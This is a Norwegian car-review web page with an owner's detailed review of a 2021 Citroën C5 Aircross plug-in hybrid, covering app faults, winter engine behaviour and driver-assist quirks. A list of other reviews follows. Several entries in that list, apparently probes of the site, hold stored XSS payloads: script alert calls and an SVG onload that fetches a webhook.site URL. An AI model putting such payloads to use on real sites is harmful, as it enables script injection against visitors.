Hvilken bil ser du etter?

Tilbake til front | Skriv en vurdering
2021 Citroën C5 Aircross Plug-In Hybrid 225 Feel SUV Bensin/Batteri

Score 9/10

Meget god bil, og god kjøre komfort.<br /> Ingen problem på vinterføre med denne. Overraskende bra. Ser ikke verdien i å legge 100.00,- ektra for å få begrenset 4WD i fra Opel (som er avhengig av elmotor på bakaksel)<br /> Dog kunne Appen for bilden hvert bedre. Endel feil og kommunikasjons problemer.<br /> Savner også en rein besinn langkjørings modus.<br /> Anbefaler å velge lader på 7.4 kW, slik at man kan lade mellom turene hvis det trengs.<br /> <br /> Edit: (fremdeles fornøyd med bilen mekanisk, men tar med noe ting som kunne hvert bedre)<br /> Har hatt bilen i over ett år, og appen er fremdeles dårlig. Har komme regelmessig oppdateringer og nye feil har regelmessig blitt innført. (noen feil har også blitt fikset, men generelt dårlig)<br /> <br /> Tips. Ønsker du pålitelig forvarming av bil, så anbefaler jeg å installere en gammeldags motor varmer og kupevarmer. Som kan brukes når appen ikke virker. Kjører du stort sett til faste tider så er ukeprogram ok.<br /> <br /> Hybrid programmet kunne også vært bedre<br /> Når det er minus grader stå starter bilden bensin motoren enten man vill eller ikke. Dette uansett om man bare skall en kort tur på butikken som er godt innen for elektrisk rekke vidde. Virker som om motoren bare går på tomgang og ikke er clutchet inn. Man kan tvinge inklutching ved å velge sports modus. Men sports modus er ikke så egnet på vinterføre, da den spinner lett på snø.<br /> synes det er mot all sunn fornuft at motoren må starte når det er minus grader og en bare skall en liten tur på butikken. Bidrar til unødvendig bensinforbruk.<br /> <br /> Savner også en bedre langtur bensin modus, ha hybrid programmet er optimalisert for kortere turer.<br /> Bilen har et batteri sparings modus på 10 og 20 km, eller max. Ofte så skulle jeg ønske at det var noe mellom 20 og max. Hvis man har kjørt litt og velger max, så lader bilen opp batteriet med bensin motoren, og forbruket går i taket. Alternativt så kan en velge sports modus og så lengen en ikke kjører hart, så holdes batteriet på det nivået en hadde ved aktivering. men i sport velges ofte et lavere gir etc og en må tvinge bilen opp i høyere gir. <br /> <br /> Selvkjørings funksjonen er ok, men værs obs på at den har sine svakheter. Dvs hold i rattet. Klarer ikke umerkede avkjørings lommer og buss lommer etc. Bremser unødvendig hart når bilen foran svinger av.<br /> den har også en tendens til å legge seg veldig nærme midtlinja. <br /> <br /> Når en kjøre med henger så deaktiveres rygge kamera. Noe som egentlig er litt idiotisk hvis man kjører en normal lav henger som ikke er bred. Da forsvinner hengeren fra speil etc og en ser ikke hengeren før det er større utslag på sving. En kan åpne døra men da går alarmen på at man åpner døra i fart. <br />

Kjøreglede

9 / 10
Fin å kjøre, gode dempere. ok respons selv i elektrisk.

Kvalitet/driftssikkerhet

10 / 10
Ingen feil eller noe å klage på sålangt.

Plass/praktiske løsninger

9 / 10
Gode løsninger

Økonomi/kostnader

10 / 10
Spare ca 100.00,- på denne vs tilsvarende 4wd utgave fra Opel.

Drivstoff/forbruk

7 / 10
Bra tall! Kjører mest elektrisk. Bensin kun på langtur. (savner en bedre lagkjøring modus)
motor blir tvangs statet i mius grader, noe som fører til ektra foruk.

Flere vurderinger

Renault 5 E-Tech (2025)

Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te

Score 8.4

Vurdert av Knut

Citroën e-C4 (2025)

Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve

Score 9.0

Vurdert av Siri

Aston Martin DB9 GT (2017)

alert("total")

Score 5.0

Vurdert av test

Aston Martin DB9 GT (2017)

totalvurderingtest

Score 5.0

Vurdert av test

Abarth 500e (2024)

Score 10

Vurdert av Bernt

Abarth 500e (2024)

Score 1.0

Vurdert av xxxfooo4

Abarth 500e (2024)

xxxfooo4

Score 3.0

Vurdert av xxxfooo4

Abarth 500e (2024)

<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>

Score 6.2

Vurdert av Bernt

Volvo EX40 (2026)

Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass

Score 1.6

Vurdert av Jorsalfar1996

Ford Explorer EV (2025)

Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.

Score 8.2

Vurdert av Adams

Ford Kuga (2021)

Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring

Score 8.6

Vurdert av Viggo

Hongqi E-HS9 (2022)

Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!

Score 8.2

Vurdert av MrP85

Mercedes-Benz EQC (2022)

Topp komfort og driftsikker.

Score 9.4

Vurdert av Renna

Polestar 2 (2022)

God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h

Score 8.8

Vurdert av Autofilen

Mercedes-Benz GLE (2020)

Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km

Score 9.6

Vurdert av Hans